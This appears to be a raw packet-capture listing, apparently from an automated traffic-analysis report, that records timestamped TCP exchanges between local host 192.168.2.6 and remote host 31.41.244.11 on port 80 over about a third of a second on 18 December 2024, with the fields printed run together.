                                                                                                                                                              Dec 18, 2024 11:47:27.807178020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.807234049 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.807296038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.807338953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.812459946 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.812531948 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.812604904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.812803984 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.818624020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.818679094 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.818706989 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.818753004 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.823982000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.824019909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.824049950 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.824064016 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.829694986 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.829746008 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.829758883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.829824924 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.835509062 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.835545063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.835596085 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.835647106 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.841207027 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.841280937 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.841361046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.841408014 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.846986055 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.847081900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.847162008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.847222090 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.852885008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.852965117 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.853039026 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.853086948 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.858634949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.858673096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.858694077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.858717918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.864418983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.864455938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.864499092 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.864526987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.869940042 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.869990110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.870043039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.870091915 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.875714064 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.875768900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.875988960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.876051903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.881386995 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.881448030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.881508112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.881628036 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.887145996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.887363911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.887434006 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.887547970 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.892884016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.893007994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.893083096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.893126011 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.898679018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.898736000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.898802996 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.898849010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.904505968 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.904589891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.904623032 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.904680014 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.910269022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.910321951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.910403013 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.910690069 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.915966988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.916018963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.916352987 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.916412115 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.922296047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.922352076 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.922418118 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.922502041 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.927473068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.927550077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.927556038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.927608967 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.933228016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.933268070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.933279991 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.933336973 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.938347101 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.938397884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.938483000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.938632965 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.947345018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.947408915 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.947411060 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.947455883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.948620081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.948667049 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.948770046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.948821068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.953161001 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.953219891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.953285933 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.953327894 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.957139015 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.957190990 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.957258940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.957309961 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.961592913 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.961639881 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.961776018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.961837053 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.966119051 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.966238022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.966250896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.966383934 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.969959021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.969995022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.970026970 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.970042944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.973918915 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.974001884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.974006891 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.974052906 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.977775097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.977787018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.977832079 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.981499910 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.981570005 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.981647968 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.981683969 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.985224962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.985275984 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.985341072 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.985487938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.989026070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.989042044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.989073992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.989101887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.992626905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.992639065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.992774963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.992774963 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.996200085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.996212006 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.996256113 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.996282101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.999814034 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.999825954 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:27.999883890 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.003232002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.003329992 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.003436089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.003485918 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.006757021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.006793022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.006819010 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.006834030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.010108948 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.010204077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.010209084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.010265112 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.012211084 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.012269020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.012304068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.012304068 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.014238119 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.014272928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.014317036 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.014393091 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.016213894 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.016298056 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.016474962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.016531944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.018280029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.018414974 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.018470049 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.020236969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.020294905 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.020373106 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.020536900 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.022324085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.022377968 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.022501945 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.022547960 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.024385929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.024441957 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.024596930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.024656057 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.026345968 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.026426077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.026448965 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.026473045 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.028352022 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.028414965 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.028492928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.028548002 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.030432940 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.030493975 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.030536890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.030600071 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.032402992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.032536983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.032608032 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.034385920 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.034440994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.034498930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.034962893 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.036436081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.036448002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.036497116 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.038482904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.038496971 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.038536072 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.040503025 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.040555000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.040705919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.042264938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.042432070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.042663097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.042710066 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.044564962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.044645071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.044699907 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.047219038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.047357082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.047413111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.048768044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.048824072 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.048887968 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.050729036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.050812960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.050873041 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.052598953 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.052650928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.052664995 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.054259062 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.054620028 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.054632902 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.054673910 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.056617975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.056761026 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.056816101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.059024096 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.059107065 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.059149981 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.061645031 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.061698914 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.061733007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.062263012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.063782930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.063831091 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.063999891 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.064045906 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.065768003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.065917969 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.065962076 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.067572117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.067636967 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.067809105 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.068732977 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.069405079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.069483995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.069672108 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.069720030 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.071259975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.071388960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.071445942 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.073400021 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.073493958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.073542118 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.075050116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.075170994 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.075232029 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.076647043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.076697111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.076772928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.078258991 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.078727961 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.078739882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.078773975 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.078792095 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.080682993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.080789089 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.080835104 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.082678080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.082937002 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.082993031 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.084522963 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.084654093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.084702969 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.086635113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.086646080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.086697102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.088496923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.088507891 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.088548899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.090385914 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.090430975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.090468884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.092408895 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.092421055 CET804983731.41.244.11192.168.2.6
